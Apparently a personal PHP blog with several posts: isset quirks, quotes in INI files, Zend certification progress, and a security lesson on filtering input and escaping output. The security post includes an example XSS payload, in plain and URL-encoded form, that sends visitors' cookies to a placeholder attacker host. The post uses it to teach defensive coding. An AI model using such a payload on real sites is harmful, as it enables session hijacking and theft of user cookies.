James Titcumb

Srsly PHP, why can’t I do this:

$value = isset($myGPCWrapper->Get("value")) ? $myGPCWrapper->Get("value") : $default;

Resulting in this:

Fatal error: Can’t use method return value in write context in /path/to/my/script.php on line 21

And instead I have to do this:

$foo = $myGPCWrapper->Get("value");
$value = isset($foo) ? $foo : $default;

or

$value = isset($_GET['value']) ? $myGPCWrapper->Get("value") : $default;

I mean… how is isset writing to my variable?!

Writing a bit of PHP tonight and found that if you use parse_ini_file to load an INI file in PHP, there is a slightly hacky way of having double quotes in strings. For example, I tried these:

somevalue = "This ""string"" has quotes"
somevalue = "This \"string\" has quotes"

But none of them worked! Turns out a quick look at the PHP manual reveals a simple (but a bit hacky) solution to this is to define a constant e.g. QUOTE to be “, and use that in the INI string.

// In the PHP:
define('QUOTE', '"');

; and in the INI file
somevalue = "This "QUOTE"string"QUOTE" has quotes"

As some of you may know, back in March/April time, I started revising for my Zend PHP5 Certification, but that was pretty much put on hold when we had a baby… now I’m revising again and after having revised a couple of topics I retook the test. As you can see, I passed it “with flying colours” this time, but still have improvement to do with Streams and Design patterns…

Comparing with my last test:

• 2 categories remained the same;
  • Database access
  • Web features)
• 4 categories improved;
  • PHP 4/5 Differences (was FAIL)
  • Security (was PASS)
  • String Manipulation and Regular Expressions (was PASS)
  • Functions (was PASS)
• 2 categories declined;
  • Streams and Network Programming (was PASS)
  • Design (was EXCELLENT) [eep - not so good that!]

I think overall however, these statistics shouldn’t be examined too much – there are some questions I can guess and don’t demonstrate that I truly *know* some topics, so I’m going to cover off a few categories I don’t feel to confident on anyway – but then the practise tests are just indicators, and not meant to represent the final exam… we’ll see!

If you follow my Twitter, then you already know that I’m intending to get a Zend PHP5 Certification. I’ve started off by ordering the Php|architect’s Zend PHP 5 Certification Study Guide from Amazon as I read an excerpt from that the other day and found it to be generally quite good. Still waiting for that to arrive, but next month I’m going to be ordering the Zend PHP Certification: Study Guide and some online practise tests. With any luck, that should be all I need to ace the test, and after reading Mike Bernat’s post about his experiences and a few other posts about the certification, I hope I should be able to pass. I’ll blog what I can about it, obviously those who take the test have to sign the NDA, but I’ll put as much of my experiences pre and post as I can.

I’m currently working on cleaning up the sanitisation and validation libraries in our homegrown framework at Netbasic here, and I was given an excerpt from the Php|architect’s Zend PHP 5 Certification Study Guide – the Security chapter. The summary section really outlines a key point you should always bear in mind when writing any PHP code… filter input, escape output.

Filtering input is important, and it is recommended to do this using a “white list” approach – i.e. you specify a valid choice of values for a particular field – if it does not match then discard it. Consider this:

// Example 1
$value = $_GET["colour"];
echo "Your favourite colour is {$value}";

This first example shows lack of filtering. Potentially, as the study guide shows, the colour could be overridden and set to be:

<script>
document.location = 'http://myhackingsite.com/getcookies.php?cookies=' + document.cookie;
</script>

This small piece of Javascript would then pick up people’s cookies. Lets look at the second example…

// Example 2
$value = "white";
$valid_colours = array("red","green","blue");
if(in_array($_GET["colour"], $valid_colours))
{
  $value = $_GET["colour"];
}
echo "Your favourite colour is {$value}";

This piece of code is much safer (although not totally secure…). $value has been initialised. Although I ensure register_globals = Off where possible, there may be some hosts that have register_globals On. The “colour” $_GET value is checked against a white list, and if it does not match, it is not assigned. If $value is not initialised and register_globals was On, then someone could pass a query such as:

http://mywebsite.com/example.php?colour=notacolour&value=%3Cscript%3Edocument.

location+%3D+%27http%3A%2F%2Fmyhackingsite.com%2Fgetcookies.php%3Fcookies%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E

What would happen is that the “colour” argument would not match the white list, but value would be initialised with the above piece of cookie-collecting Javascript. An even safer version of this code is with escaped output:

// Example 3
$value = "white";
$valid_colours = array("red","green","blue");
if(in_array($_GET["colour"], $valid_colours))
{
  $value = $_GET["colour"];
}
$value = htmlentities($value);
echo "Your favourite colour is {$value}";

Even with register_globals On and $value uninitialised, the end user will just see the Javascript directly, rather than the browser parsing it.

Don’t forget, output isn’t limited to just outputting to the browser through echo or print – you need to think about storing data, such as in MySQL databases or in files. Thankfully, PHP provides database-specific escaping functions, such as mysql_real_escape_string.

There’s much more to this than just what I’ve explained, and the study guide goes into a bit more depth. I recommend you pick up a copy and read it, even if you’re not studying for a Zend certification.